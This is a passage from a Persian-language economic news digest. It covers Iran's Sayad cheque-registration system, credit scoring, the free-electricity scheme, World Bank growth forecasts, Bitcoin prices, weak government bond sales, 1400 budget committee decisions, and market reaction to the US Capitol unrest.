صادرکننده چک می‌تواند با در اختیار داشتن یکی از کارت‌های بانکی صادر شده از سوی بانکی که دسته چک وی را صادر کرده و با استفاده از سیم‌کارت متعلق به خود از طریق برنامک موبایلی، با وارد کردن اطلاعات شناسه صیادی ۱۶ رقمی مندرج در برگه چک که قصد صدور آن را دارد، وارد منوی ثبت چک‌شده و اطلاعات چک صادره خود شامل تاریخ، مبلغ و مشخصات ذی‌نفع را وارد کند.

ب- نحوه استفاده گیرندگان چک از برنامک‌های موبایلی:

گیرنده چک می‌تواند با در اختیار داشتن هریک از کارت‌های بانکی خود و سیم‌کارت متعلق به خود، از طریق برنامک موبایلی، با وارد کردن اطلاعات شناسه صیادی ۱۶رقمی مندرج در برگه چک دریافتی، وارد منوی تایید چک شده و اطلاعات چک ثبت شده به نفع خود را با اطلاعات مندرج در برگه چک تطبیق داده و مراتب تایید یا عدم تایید خود را اعلام کند. پس از تایید چک، گیرنده می‌تواند چک ثبت‌شده را به ذی‌نفع جدید منتقل کند.

در پایان خاطرنشان می‌سازد به‌‌رغم اختیاری بودن فرآیند‌های مرتبط با ثبت چک‌ها در سامانه صیاد تا اطلاع ثانوی، برنامک‌های موبایلی، اینترنت‌بانک و موبایل‌بانک‌ موسسات اعتباری فرصت آموزش و آشنایی هموطنان با سامانه یادشده، تا زمان الزامی شدن ثبت سیستمی و ممنوعیت پشت‌نویسی چک‌ها را فراهم کرده‌اند و توصیه اکید این بانک نیز بهره‌برداری از زیرساخت‌های موصوف از سوی صادرکنندگان و دارندگان‌ چک است، تا با آموزش و شناخت حاصل‌شده، قانون صدور چک با سهولت و کیفیت بهتری در جامعه اجرایی شود.

بانک‌ها موظف به اعلام امتیاز
براساس آخرین دستورالعمل ابلاغی از سوی بانک‌مرکزی، کلیه بانک‌ها از ۲۰ دی ماه موظف هستند که اعتبار افراد را به آنها اعلام کنند. در گذشته رتبه‌بندی برای اعتبار و تسهیلات در بانک‌ها استفاده می‌شد و در قانون جدید رتبه‌بندی و امتیازدهی برای سامانه‌های خدماتی نیز در بانک‌ها استفاده خواهد شد.

بنابراین پس از نهایی شدن قانون جدید چک، سقف اعتبار مجاز متقاضی دسته چک اعم از اشخاص حقیقی دارای حساب جاری غیرتجاری، اشخاص حقیقی دارای حساب جاری و اشخاص حقوقی، حسب مورد با توجه به انفرادی یا مشترک بودن حساب و نیز متناسب با نتایج گزارش اعتباری و امتیاز اعتباری دریافتی از شرکت‌های اعتبارسنجی یا گزارش رتبه‌بندی دریافتی از موسسات رتبه‌بندی اعتباری، توسط سامانه صیاد براساس شیوه‌نامه‌ای که توسط بانک‌مرکزی تدوین و به تصویب شورای پول و اعتبار می‌رسد، محاسبه خواهد شد. تا قبل از ابلاغ شیوه نامه یادشده کلیه بانک‌ها صرفا موظف هستند رتبه اعتباری یا امتیاز اعتباری مذکور را به فرد اعلام کنند.

ثبت، تایید و انتقال چک در سامانه صیاد تا اطلاع‌ ثانوی به‌صورت اختیاری است و تمام چک‌ها طبق روال ‌سابق بدون نیاز به ثبت در سامانه اشاره شده در شبکه بانکی کشور پذیرش و پردازش خواهند شد. بنابراین باتوجه به اختیاری بودن فرآیند ثبت چک در سامانه یادشده، انتقال چک طبق روال سابق از طریق پشت نویسی با ذکر هویت گیرنده جدید شامل نام و نام خانوادگی/ نام شرکت و شماره/ شناسه ملی معتبر خواهد بود. به عبارت دیگر با عرضه چک‌های با ظاهر و مندرجات جدید که زمان انتشار آن توسط بانک‌مرکزی اعلام خواهد شد، طبق قانون ثبت در سامانه صیاد برای این نوع از چک‌ها، اجباری خواهد شد.

۸ : برق رایگان شد

غلامعلی رخشانی مهر از کاهش ۹.۸ درصدی جمعیت پرمصرف‌های برق کشور نسبت به مدت مشابه سال گذشته، خبر داد و اظهار داشت: مدیریت انرژی به خصوص در زمستان از مهم‌ترین مسائل جهانی است، کشور ما نیز از این مسئله مستثنی نیست و باید در همه بخش‌ها برای آن فکری کرد.

معاون امور توزیع برق توانیر با بیان اینکه طرح برق امید از آبان ماه امسال شروع و در یک دوره دو ماهه پایش انجام شده است، گفت: این طرح برای کسانی اجرا شده است که سهم کمتری از انرژی کشور را مصرف می‌کنند. در دور نخست توزیع قبض برق امید، ۷.۲ میلیون مشترک خوش مصرف از بین ۳۰ میلیون مشترک برق کشور شناسایی شد که ۵.۸ میلیون مشترک کم مصرف مشمول تخفیف صددرصدی شده است.

رخشانی مهر با بیان اینکه مشترکان برق می‌توانند همه اطلاعات مورد نظر خود را در قبوض جدید برق ببینند، ادامه داد: در این قبوض علاوه بر قبض قدیمی بخش‌های جدید نیز با اطلاعات متنوع اضافه شده است.

وی افزود: میزان مصرف فعلی، مدت مشابه سال گذشته و پیش بینی دوره بعد، رشد و یا کاهش مصرف، عدد الگوی مصرف، تفاوت برق مصرف شده در مقایسه با مشترکان مجاور، پیام‌های مربوط به وضعیت مصرف (کم مصرف، خوش مصرف و پرمصرف) و موضوعات دیگر از جمله موارد عنوان شده در قبوض جدید است.

معاون امور توزیع برق توانیر ادامه داد: صرفه‌جویی در مصرف به خصوص گاز تا یک درجه و یا خاموش کردن یک یا دو لامپ کم مصرف می‌تواند گاز مورد نیاز نیروگاه‌ها را برای تولید برق تأمین کند و امکان اعمال خاموشی را برطرف کند.

۹ : ارزیابی بانک جهانی از رشد اقتصادی ایران

در بخشی از گزارش بانک جهانی، پیش‌بینی شده اقتصاد ایران در سال آینده رشد مثبت ۱.۵ درصد داشته باشد. عمده دلیل این افزایش رشد اقتصادی به دلیل کنترل شیوع کرونا، افزایش مصرف و بهبود صنعت توریسم خواهد بود.

بانک جهانی در تازه‌ترین گزارش خود از روند رشد و توسعه اقتصادی در امسال میلادی پیش‌بینی کرد که رشد اقتصادی جهان در ۲۰۲۱ حدود ۴ درصد باشد. در سال ۲۰۲۰ اقتصاد جهان حدود ۴.۳ درصد کوچک‌تر شده بود. عمده دلیل رشد اقتصادی مثبت در امسال میلادی، توزیع واکسن، اتخاذ تدابیر سختگیرانه‌تر و اعمال محدودیت‌ها برای قطع زنجیره انتقال ویروس است. به نظر می‌رسد با فرض بهبود شرایط و توزیع سریع‌تر واکسن در کشورها، اقتصاد در امسال ۰.۳ درصد کوچک‌تر از سال گذشته باشد. بانک جهانی معتقد است بحرانی که کرونا برای جهان ایجاد کرد، بدتر از بحران «ورشکستگی بزرگ» در دهه ۳۰ است و حتی ممکن است پیش‌بینی‌ها با اعلام موارد جهش‌یافته‌تر، کندتر شوند.

در گزارش این نهاد بین‌المللی، رشد چین در امسال حدود ۸ درصد برآورد شده، اما اروپا و امریکا همچنان رشد کمتری از چین خواهند داشت. بانک جهانی در بخش‌هایی از گزارش خود می‌افزاید که «کرونا دورنمای رشد اقتصادی حداقل برای یک دهه را کاهش داده و به نظر می‌رسد دولت‌ها با مشکلات زیادی دست و پنجه نرم کنند، مگر اینکه در آموزش، بهداشت، بهره‌وری، تجارت و محیط‌زیست اقداماتی برای بهبود این بخش‌ها انجام دهند.»

کرونا، بدتر از ورشکستگی بزرگ
تا لحظه نگارش این گزارش (چهارشنبه ساعت ۱۶) آمار مبتلایان و فوتی‌ها کرونا به ترتیب حدود ۸۶ میلیون و ۸۴۰ هزار و یک میلیون و ۸۷۶ هزار و ۳۰۰ نفر اعلام شده است. این ویروس که انواع جهش‌یافته بسیاری از آن شناسایی شده، می‌تواند حداقل تا یک دهه شرایط زندگی همه مردم کره‌زمین را تغییر داده و میلیون‌ها نفر را به ورطه فقر مطلق بیندازد. بانک جهانی پیش‌بینی کرده این ویروس تا مدت طولانی که هیچ‌کس نمی‌داند چه زمانی است، فعالیت‌های اقتصادی را کاهش خواهد داد و به تبع آن درآمد‌ها نیز افت خواهند داشت.

به باور این نهاد بین‌المللی اولویت سیاستگذاران و تصمیم‌سازان باید جلوگیری از گسترش این ویروس و واکسیناسیون سریع و عمومی باشد، چراکه هر تصمیمی درنهایت باید باتوجه به شرایط کرونا در کشور‌ها اتخاذ شود. به باور نویسندگان این گزارش، برای حمایت از اقتصاد و گام گذاشتن در مسیر بهبودی، باید یک چرخه‌ای از سرمایه‌گذاری‌ها با هدف رشد پایدار اقتصاد که وابستگی کمی به دولت دارد، بنیان نهاد. هر چند این توصیه برای بسیاری از کشور‌ها به خصوص کشور‌های در حال توسعه و اقتصاد‌های نوظهور کارایی نخواهد داشت، چراکه در این اقتصاد‌ها دولت‌ها همه‌کاره هستند و در اقتصاد‌های توسعه‌یافته نیز با تصویب بسته‌های حمایتی مالی، عملا نقش دولت‌ها در اقتصاد بیشتر شده و به نظر می‌رسد همین امر می‌تواند موجبات تشدید کسری بودجه در بیشتر کشور‌ها را پدید آورد. دیوید مالپاس، رئیس گروه بانک جهانی معتقد است در حالی که امسال، نوید یک بهبودی در اقتصاد جهانی است، اما سیاستگذاران و تصمیم‌سازان با مشکلات عدیده‌ای روبه‌رو خواهند شد؛ سلامت عمومی، مدیریت بدهی، سیاست‌های بودجه، بانکداری مرکزی و اصلاحات ساختاری بخشی از مشکلات پیش روی دولت‌ها خواهد بود. این مسائل می‌تواند آنچه از اقتصاد پیش روی اقتصاد‌های نوظهور و در حال توسعه است، شکننده و غیرقابل انعطاف کند.

سناریوی منفی، همچنان جدی است
با وجود اینکه واکسن‌های مختلفی برای مقابله با کرونا مجوز تزریق دریافت کرده‌اند، اما بانک جهانی همچنان شیوع شدیدتر کرونا و کاهش یا توقف واکسیناسیون عمومی را جدی‌ترین و بدبینانه‌ترین سناریو برای رشد اقتصادی کشور‌ها می‌داند. این رخداد می‌تواند رشد اقتصادی را تا ۱.۶ درصد کاهش دهد، اما اگر سناریوی خوشبینانه که همان قطع زنجیره انتقال ویروس و واکسیناسیون گسترده‌تر است، رشد اقتصاد را تا ۵ درصد (یک درصد بیشتر از پیش‌بینی) افزایش می‌دهد.

رشد اقتصادی امریکا، ۳.۵ درصد و چین حدود ۸ درصد
پیش‌بینی بانک جهانی از رشد اقتصادی دو قدرت جهان، ۳.۵ و ۷.۹ درصد است. رشد اقتصادی منطقه یورو نیز که در سال گذشته کاهشی ۷.۷ درصدی داشته، به ۳.۶ درصد می‌رسد. ژاپن نیز ۲.۵ درصد رشد خواهد داشت. در بخشی از گزارش بانک جهانی آمده که تولید ناخالص داخلی در اقتصاد‌های نوظهور و در حال توسعه پس از انقباض ۵ درصدی در سال گذشته میلادی، در سال پیش رو ۳.۴ درصد رشد را تجربه خواهند کرد.

خاورمیانه نیز رشد می‌کند
بانک جهانی معتقد است منطقه خارومیانه پس از مشکلات عدیده‌ای که در سال ۲۰۲۰ با آن درگیر بود، امسال را با رشد اقتصادی ۲.۱ درصد به پایان می‌رساند. باتوجه به اینکه کشور‌های این منطقه در حال توسعه هستند، نفت تاثیر تعیین‌کننده‌ای بر رشد اقتصادی آنها خواهد داشت، به‌گونه‌ای که احتمال عادی شدن تقاضای نفت و به تبع آن افزایش قیمت‌ها، پایان یافتن توافق کاهش تولید اوپک پلاس در ۲۰۲۱ و برداشتن تدریجی محدودیت‌های سفر از مهم‌ترین عوامل بهبود‌دهنده رشد اقتصادی ۱.۸ درصدی کشور‌های صادرکننده نفت است. با این وجود به دلیل کاهش درآمد‌های نفتی در سال ۲۰۲۰، خطر تشدید کسری بودجه همچنان برای کشور‌های صادرکننده وجود دارد. به باور بانک جهانی رشد اقتصادی عراق، عربستان و امارات به ترتیب با ۲، ۲ و ۳ درصد از دیگر کشور‌های منطقه خاورمیانه بیشتر خواهد بود. مهم‌ترین دلیل این افزایش رشد اقتصادی به دلیل پروژه‌های بزرگ سرمایه‌گذاری نفتی و تقویت تقاضای نفت است.

رشد اقتصادی کشور با بهبود وضعیت توریسم

در بخشی از گزارش بانک جهانی، پیش‌بینی شده اقتصاد ایران در سال آینده رشد مثبت ۱.۵ درصد داشته باشد. عمده دلیل این افزایش رشد اقتصادی به دلیل کنترل شیوع کرونا، افزایش مصرف و بهبود صنعت توریسم خواهد بود. پس از سه سال رشد اقتصادی منفی ۶ درصدی در سال ۲۰۱۸، منفی ۶.۸ درصدی در سال ۲۰۱۹ و منفی ۳.۷ درصدی در سال گذشته، این پیش‌بینی می‌تواند تا حدی نشان دهد اقتصاد در مسیر ریکاوری قرار دارد. هر چند نباید از مشکلاتی که کسری بودجه می‌تواند بر اقتصاد و رشد اقتصادی آورد، غافل شد. پیش‌بینی این نهاد بین‌المللی از رشد اقتصادی در سال ۲۰۲۲، ۱.۷ درصد است.

همه‌گیری و مخاطرات بدهی
بانک جهانی معتقد است همه‌گیری یک خطر جدی برای تمام جهان داشته و آن افزایش و تجمیع بدهی‌هاست. تلنبار شدن بدهی‌ها زمانی نگران‌کننده‌تر می‌شود که ممکن است اصلاحات اقتصادی را سخت‌تر و روند بهبود اقتصادی را کندتر کند. در این صورت تلاش سیاستمداران و تصمیم‌سازان برای هماهنگی اقتصادی کارایی خود را از دست می‌دهد. در واقع کرونا ریسک بدهی در بازار‌های نوظهور و در حال توسعه را تشدید می‌کند که این امر می‌تواند باعث افزایش فشار بدهی و کاهش توانایی وام‌گیرندگان در بازپرداخت بدهی‌ها شود.

این روند ممکن است یک دهه به طول بینجامد که در این‌صورت فاصله بین کشور‌های توسعه‌یافته و در حال توسعه و نوظهور بیشتر و بیشتر می‌شود؛ چیزی که کشور‌ها نمی‌توانند آن را بپذیرند. بانک جهانی معتقد است برای کاهش فشار بدهی باید همه کشور‌ها همکاری کنند، چراکه ممکن است بدهی در اقتصاد‌های نوظهور و در حال توسعه به اندازه ۹ درصد تولید ناخالص داخلی در ۲۰۲۰ بیشتر شود.

۱۰ : بیت‌کوین از ۳۶هزار دلار هم عبور کرد

تقویت سهموی قیمت بیت‌کوین روز گذشته بار دیگر شدت یافت و این رمزارز با عبور از مرز ۳۶ هزار دلار تاکید کرد که هنوز هم فرصت رشد بیشتر برای بازار رمزارزها وجود دارد.

بررسی نمودارها بیانگر آن است که بیت‌کوین طی یک هفته گذشته بیش از ۲۵ درصد افزایش قیمت داشته است.

بیت‌کوین امروز با افزایش ۶.۳۷ درصدی نسبت به روز گذشته به قیمت ۳۶ هزار و ۹۵۶ دلار در حال معامله است.

۱۱ : حداکثر زمان اعتماد بانک ها به دولت برای وام دهی

وزارت امور اقتصادی و دارایی هر هفته حجم مشخصی از اوراق را برای فروش در بازار اولیه معرفی می کند. در هفته اخیر وزارت امور اقتصادی و دارایی قصد فروش ۱۲ هزار و ۶۳۰ میلیارد تومان اوراق داشته است اما فقط هزار و ۵۶۰ میلیارد تومان آن فروش رفته است. یعنی ۸۷ درصد اوراق روی دست دولت مانده است.دلیل؛ بانک ها و نهادهای مالی حاضر نیستند با این نرخ ها اوراق های با سررسید بالا را از دولت بخرند.

شمای کلی بازار بدهی
یکی از اتفاقات مثبت در این دوره سیاست گذاری اقتصادی، استقراض قاعده مند دولت برای کسری بودجه است، پیش از این دولت کسری خود را در قالب وام از بانک ها و بانک مرکزی تامین می کرد و چون در برابر این وام پشتوانه ای وجود نداشت بازپرداخت آن هم انجام نمی شد. فقط کافی است به مطالبات انباشته نظام بانکی از دولت توجه شود. بیش از ۳۰۰ هزار میلیارد تومان. این نحوه استقراض علاوه بر این که بخش خصوصی را از منابع بانکی محروم می کرد به دلیل قفل شدن مطالبات از دولت جریان نقد بانک ها را نیز دچار معضل می کرد و مستقیم و غیر مستقیم به پایه پولی فشار می آورد؛ اتفاقی که موجب تحمیل تورم بیشتر بر مردم بود. اما با راه اندازی بازار اوراق استقراض دولت قاعده مند شد. در این حالت دولت سندی را تحویل تامین کنندگان می دهد که اگر نیاز به نقدینگی داشتند قبل از سررسید در بازار ثانویه بفروشند. بدین ترتیب علاوه بر اینکه قرض دهی به دولت از حالت یک کوچه بن بست به یک میدان تبدیل می شود بازاری نیز ایجاد می شود که در آن امکان سرمایه گذاری برای سرمایه گذاران محافظه کار شکل بگیرید تا بدون ترس از نکول و سوخت شدن پول خود اقدام به سرمایه گذاری کنند. این دو بازار می توانند به کشف حداقل بازدهی مورد انتظار مردم نیز کمک کنند. از روز راه اندازی این بازار در ایران که اواخر بهار بود جلسات حراج هر هفته به منظور تامین کسری بودجه دولت برگزار می شود. بازیگران این بازار، دولت در نقش فروشنده اوراق، بانک مرکزی کارگزار دادو ستد و بانکهاو نهادهای سرمایه ای در مقام خریدار هستند.اوراق عرضه شده در این بازار غالبا اوراق «اراد» بوده که هر کدام نرخ سودی مشخص و تاریخ سررسیدی معلوم دارد.

وضعیت فروش اوراق در آخرین هفته
مجموع اوراق عرضه شده دولت در هفته اخیر ۱۲ هزار و ۶۳۰ میلیارد تومان بوده که از این میان تنها هزار و ۵۶۰ میلیارد تومان آن برای بانکها و نهادهای سرمایه ای جذابیت خرید داشته است.یعنی در هفته سوم زمستان تنها ۱۲٫۳ درصد از کل اوراق عرضه شده دولت در این هفته به فروش رسید.

چنانچه هر کدام از این اوراق را به صورت مجزا بررسی کنیم مشخص می شود کدامیک فروش بیشتر و کدامیک فروش کمتری را ثبت کرده است. با این عمل می توان علت کمی جذابیت در این بازار برای خریداران را بررسی کرد.

چه اوراقی جذابتر هستند؟
مقایسه عرضه وتقاضای هرکدام از اوراق نشان می دهد « اراد ۵۸» و « اراد ۶۴» به ترتیب نسبت بیشتری از میزان عرضه خود را در این هفته در میان سایر اوراق به فروش رسانده اند.

به عبارت دیگر از ۲۳۰ میلیارد تومان پیشنهادی دولت از « اراد۵۸» ۲۱۰ میلیارد تومان آن به فروش رسیده و هزار و ۱۲۰ میلیارد تومان نیز از ۴ هزار و ۴۰۰ میلیارد تومان پیشنهاد «اراد ۶۴» متقاضی داشته است.

سایر اوراق عرضه شده دولت یا فروش کمتری نسبت به هدف گذاری دولت داشته یا اصلا هیچ تقاضایی برای آنها ثبت نشده است.

به عنوان مثال ۵ هزار میلیارد تومان «اراد۶۵» توسط دولت در این هفته در معرض فروش قرار گرفته بود که نه برای بانکها و نه برای نهادهای سرمایه ای هیچکدام جذابیتی نداشت.

در بررسی دقیقتر ویژگی اوراق با فروش بالاتر مشاهده می شود که آن اوراقی برای فروش جذابتر بوده که تاریخ سررسید نزدیک تری داشته باشند در واقع بانک ها و نهاد سرمایه گذاری ترجیح می دهند با سررسید کمتری به دولت قرض دهند ولو اینکه یک درصد سود کمتری دریافت کنند. سررسید محبوب برای قرض دهی به دولت دوساله است

از آنجا که دولت باید تا پایان سال ۳۲ هزار و ۵۰۰ میلیارد تومان از کسری خود را از این طریق تامین کند لزوم فروش دولت در این بازار بیش از پیش به چشم می آید.

راز کاهش جذابیت اوراق با سررسید بالای دو سال
حراج در بازار اولیه بدهی با هدف تامین کسری بودجه دولت انجام می شود و دولت تا پایان سال بیش از ۳۰ هزار میلیارد تومان اوراق بفروشد. وزارت امور اقتصادی و دارایی به دلیل نگرانی از بازپرداخت اوراق با سررسید کوتاه مدت منتشر نمی کند. از سوی دیگر به دلیل بار مالی حاضر به پذیرش نرخ های سود بالاتر نیست. بانک ها نیز با نرخ های سود ۲۱ درصد حاضر به خرید اوراق سه ساله دولت نیستند. این وسط یک نیاز قطعی ۳۰ هزار میلیارد تومانی هم وجود دارد. اگر قرار باشد از مسیرهای کم تورم و کم ریسک این شکاف پر شود دو راه بیشتر وجود ندارد:

انتشار اوراق با سررسیدهای کمتر از دو سال و با نرخ های کنونی

یا افزایش نرخ سود اوراق با سررسید سه سال.

هر کدام از این دو راه مسائل خاص خود را دارد اما بسیار کم هزینه تر و کم مساله تر در مقایسه با فروش اوراق به بانک مرکزی است. زیرا در این حالت مردم تاوان تورمی سنگین تری پرداخت می کنند.

۱۲ : تعرفه جدید واگذاری و تعویض پلاک خودرو

رحیم زارع سخنگوی کمیسیون تلفیق بودجه مجلس، با اشاره به مصوبات نشست عصر روز گذشته (چهارشنبه) کمیسیون تلفیق بودجه ۱۴۰۰ گفت: معافیت مالیاتی فعالیت‌های مربوط به انتشارات و کمک درسی و فعالیت‌های هنری از قبیل بازیگری در سال آینده صرفا تا سقف ۵۰۰ میلیون تومان از پرداخت مالیات معاف خواهند بود و در ازای درآمد بیشتر حسب مورد به نرخ ماده (۱۰۵) یا ماده (۱۳۱) قانون مالیات‌های مستقیم مشمول مالیات می‌شوند.

وزارتخانه‌های نفت و کشور مسئول احداث جایگاه‌های ایمن سوخت گاز مایع
وی تصریح کرد: وزارتخانه‌های نفت و کشور موظف به احداث جایگاه‌های ایمن و زیرساخت استفاده قانونمند از سوخت گاز مایع (LPG) در ناوگان حمل و نقل با اولویت ناوگان عمومی و حمل بار به کمک بخش‌های خصوصی و عمومی تا سقف مجموع ۲ میلیون تُن در سال شدند.

زارع افزود: وزارتخانه‌های مذکور از طریق شرکت‌های تابعه مجاز به خرید گاز مایع از کشور‌های دیگر و یا تهاتر آن با بنزین و گازوئیل از شرکت ملی نفت ایران و یا سایر شرکت‌های تابعه وزارت نفت هستند و معادل وزنی گاز مایع خریداری یا تهاتر شده از منابع فوق الذکر، نفت گاز یا بنزین صادر کرده و تمام عواید حاصل از آن را به حساب شرکت تابعه ذی‌ربط آن وزارتخانه واریز می‌کنند.

تشویق سرمایه‌گذاری در شهرک‌های کشاورزی
نماینده مردم آباده، بوانات، خرم بید و سرچهان در مجلس تصریح کرد: به منظور حمایت و تشویق سرمایه‌گذاری در شهرک‌های کشاورزی در سال آینده، تعرفه آب مصرفی واحد‌های مستقر در این شهرک‌ها به نرخ مصوب فعالیت‌های کشاورزی محاسبه می‌شود و این شهرک‌ها و واحد‌های مستقر در آن‌ها از پرداخت حق النظاره ماده ۳۳ قانون توزیع عادلانه آب مصوب سال ۱۳۶۶ معاف خواهند شد.

سخنگوی کمیسیون تلفیق لایحه بودجه ۱۴۰۰ مجلس بیان کرد: براساس مصوبه این کمیسیون، وزارت دفاع و پشتیبانی نیرو‌های مسلح می‌تواند با استفاده از وجوه ارزی حاصل از دعاوی مطروحه پذیرفته شده خود در محاکم بین‌المللی، نسبت به تسویه دیون و تامین تجهیزات این وزارتخانه تا سقف ۲۰۰ هزار میلیارد ریال اقدام کند.

وی همچنین با اشاره به الحاق یک بند به تبصره ۱۲ لایحه بودجه سال ۱۴۰۰ گفت: به قوه قضاییه اجازه داده شد تا نسبت به فروش اموال و املاک مازاد و فرسوده خود تا سقف ۲۰ هزار میلیارد ریال اقدام و پس از واریز آن به خزانه، درآمد حاصل از فروش را صرف خرید، احداث، تکمیل و تجهیز ساختمان‌های این قوه کند.

زارع تاکید کرد: عوارض هوایی خروج از کشور برای مسافران در سال آینده هم ۴۰۰ هزار تومان تعیین شد.

تخصیص ۲ میلیون تُن قیر برای آسفالت راه‌های فرعی و روستایی
نماینده مردم آباده، بوانات، خرم بید و سرچهان در مجلس با بیان اینکه دولت در سال آینده موظف به تخصیص ۲ میلیون تُن قیر نفت خام خارج از بورس به قیمت فوب خلیج فارس برای آسفالت راه‌های فرعی و روستایی و روکش آسفالت شبکه راه‌های اصلی، فرعی بزرگراه‌ها شد، اظهار کرد: براین اساس ۲۰ درصد از این میزان قیر به منظور آسفالت راه‌های فرعی و روستایی و روکش آسفالت شبکه راه‌های اصلی، فرعی بزرگراه‌ها و شهرک‌های صنعتی، عشایری و معابر محلات در اختیار وزارت راه و شهرسازی قرار خواهد گرفت.

سخنگوی کمیسیون تلفیق لایحه بودجه ۱۴۰۰ مجلس ادامه داد: ۱۷ درصد برای آسفالت معابر و بهسازی روستا‌ها و اجرای پروژه‌های مشارکتی با نهاد‌های محلی و دهیاری به سازمان دهیاری‌ها، ۱۶ درصد برای مصرف پایگاه‌ها و پاسگاه‌ها و راه‌های بین مزارع به بسیج سازندگی سپاه، ۱۵ درصد برای نوسازی مدارس و دانشگاه‌ها و دانشگاه فرهنگیان و ۴ درصد برای بیابان زدایی و انجام عملیات خاک پوشی (مالش پاشی) تخصیص خواهد یافت.

وی اظهار کرد: به منظور جلوگیری از تغییر کاربری اراضی زراعی و باغات و مقابله با پدیده زمین خواری و ساخت و ساز‌های خلاف هم کلیه استانداری‌ها موظف شدند تا با فعال کردن کمیسیون ماده ۹۹ قانون شهرداری‌ها با اصلاحات و الحاقات بعدی آن در کلیه فرمانداری‌ها، ضمن برخورد فعال با ساخت و ساز‌های خلاف در خارج از محدوده و حریم شهرها، کلیه جرائم تخلفات ساختمانی را به حساب درآمد عمومی نزد خزانه‌داری کل کشور واریز کنند و درآمد حاصله هم تا سقف ۸ هزار میلیارد ریال جهت تهیه طرح‌های هادی با بازنگری و اجرای طرح‌های هادی و بهسازی روستا‌ها اختصاص خواهد یافت.

تعیین تعرفه واگذاری و تعویض پلاک خودرو
زارع با اشاره به مصوبه کمیسیون تلفیق لایحه بودجه سال ۱۴۰۰ درباره میزان تعرفه تعویض پلاک خودرو‌ها هم گفت: تعرفه واگذاری و تعویض پلاک خودرو برای خودرو‌های با قیمت تا ۲۰۰ میلیون تومان، ۲۰۰ هزار تومان و برای خودرو‌های بالای ۲۰۰ میلیون تومان هم ۳۰۰ هزار تومان تعیین شد که صددرصد مابه‌التفاوت درآمد حاصله به نیروی انتظامی اختصاص می‌یابد، همچنین تعیین قیمت خودرو برمبنای فهرست بهای اعلامی سازمان امور مالیاتی است. br/ نماینده مردم آباده، بوانات، خرم بید و سرچهان در مجلس تصریح کرد: دولت به منظور تنظیم بازار خودرو‌های وارداتی مکلف شد، ضمن شناسایی خودرو‌های خارجی غیرآمریکایی موجود در مناطق آزاد با اخذ حقوق گمرکی و سود بازرگانی متناسب با معیار‌های مشخص شده، ظرف مدت یک ماه از تاریخ ابلاغ این قانون نسبت به ثبت سفارش و اجازه واردات خودرو‌های غیرآمریکایی موجود در مناطق آزاد تجاری و صنعتی اقدام کند. نرخ سود بازرگانی در تناسب با نوع خودرو و سال ساخت باید بگونه‌ای تنظیم شود که در مقایسه با قیمت‌های کف بازار، منجر به سود غیرمتعارف بیش از ۲۰ درصد برای واردکنندگان نشده و در صورت مشاهده روند فزاینده تفاوت میان قیمت‌های کف بازار و وارداتی، دولت می‌تواند نسبت به تجدیدنظر در نرخ سود بازرگانی اقدام کند.

ممنوعیت واردات خودرو به مناطق آزاد تجاری و صنعتی
وی تاکید کرد: واردات خودرو‌های موضوع این تبصره برای سازمان‌های مناطق آزاد تجاری و صنعتی و شرکت‌های تابعه آن‌ها و دستگاه‌های موضوع ماده ۵ قانون مدیریت خدمات کشوری و نهاد‌های عمومی غیردولتی و شرکت‌های تابعه آن‌ها ممنوع است، همچنین واردات هرگونه خودرو در سال ۱۴۰۰ به مناطق آزاد تجاری و صنعتی ممنوع است.

۱۳ : اتفاقات امریکا روی بورس ایران تاثیر می‌گذارد؟

دوهفته مانده به پایان دوره ریاست جمهوری ترامپ در ایالات متحده وی با فراخوان حامیانش در واشنگتن و با ارائه یک سخنرانی در رد انتخابات برگزار شده ریاست جمهوری، زمینه ساز یورش طرفدارانش به کنگره امریکا شد. اتفاقی که هرچند بی‌سابقه بود اما نه تنها تاثیری در بازار جهانی بورس نگذاشت بلکه بیشتر بورس‌ها روند صعودی خود را حفظ کردند، در این راستا یک کارشناس بازار سرمایه بر این باور است که آشوب‌های ایجاد شده در امریکا، روی بورس ایران نیز تاثیرگذار نخواهد بود.

با وجود اینکه پس از ورود هواداران ترامپ به بخش هایی از ساختمان کنگره امریکا، اکنون اوضاع تا حد زیادی کنترل شده است اما جو امنیتی سنگینی در اطراف کنگره وجود دارد. با این حال بازارهای مالی در جهان کماکان واکنش شدیدی به اوضاع نشان نداده‌اند و انتظار آرام تر شدن شرایط را دارند.

به طوریکه به جز نزدک کامپوزیت، هر چهار شاخص عمده دیگر وال استریت روند صعودی خود را حفظ کردند. نزدک کامپوزیت ۰.۶۱ درصد پایین رفت اما شاخص نیویورک کامپوزیت صعود نیرومند ۱.۷۴ درصدی را به ثبت رساند.در اروپا هیچ تغییری در چهار شاخص اصلی ( فوتسی ۱۰۰ انگلیس، کک ۴۰ فرانسه، دکس ۳۰ آلمان و ایبکس اسپانیا) ایجاد نشده است.

در آسیا معاملات دوباره از سر گرفته شده است و تا لحظه تنظیم این گزارش ( ۲.۳۰ به وقت شرقی) به جز شاخص هانگ سنگ بورس هنگ کنگ که ریزش ۰.۲۲ درصدی داشته است، سایر شاخص‌های مهم از جمله نیک کی ۲۲۵ ژاپن و شانگهای کامپوزیت چین صعودی بوده‌اند و به ترتیب ۱.۶ درصد و ۱.۷۷ درصد بالا رفته‌اند.

تاثیر آشوب‌های امریکا بر بورس ایران
در این راستا، روزبه شریعتی با اشاره به آشوب‌های اخیر در امریکا، درمورد واکنش‌های بورس ایران و بازارهای جهانی بورس اظهار کرد: واکنش بازارهای جهانی که بسیار بزرگ تر و نقدشونده تر از بازار بورس ایران هستند، معمولا نسبت به اتفاقات سیاسی می‌تواند قبل توجه تر باشد. در همه اتفاقات گذشته از جمله کرونا، بازارهای جهانی درحال اصلاح بودند درحالی که بورس ایران صعودی بود، زیرا بازار جهانی به این شکل نیست که با سیستم حمایتی حفظ شود. روند بازارهای جهانی مشخصا به عملکرد شرکت‌ها و سیاست‌های کلان بستگی دارد و بر اساس تولید واقعی پیش می‌رود درحالی که بازار بورس ایران تورم محور است.

وی ادامه داد: وقتی بازارهای جهانی اعم از انس، کامودیتی‌ها و بورس امریکا واکنش خاصی به این اتفاقت نشان نمی‌دهد یعنی بازارهای مالی پذیرفته‌اند که این ماجرا یک شوآف سیاسی با حرکت پوپولیستی از سمت ترامپ است. چنین واکنش‌های عجیب و غریب در بازارهای جهانی و ایجاد تنش باید سرمایه‌گذاران را به سمت بازارهای کم ریسک از جمله طلا اما سوق دهد اما این اتفاق از دیروز تا کنون رخ نداده است.

این کارشناس بازار سرمایه تاکید کرد: بازار بورس ایران هم نسبت به این موضوع واکنش نشان نمی‌دهد و چنین آشوب هایی در امریکا برایش مهم نیست. این اتفاق هم در امریکا هم ادامه دار نخواهد بود.

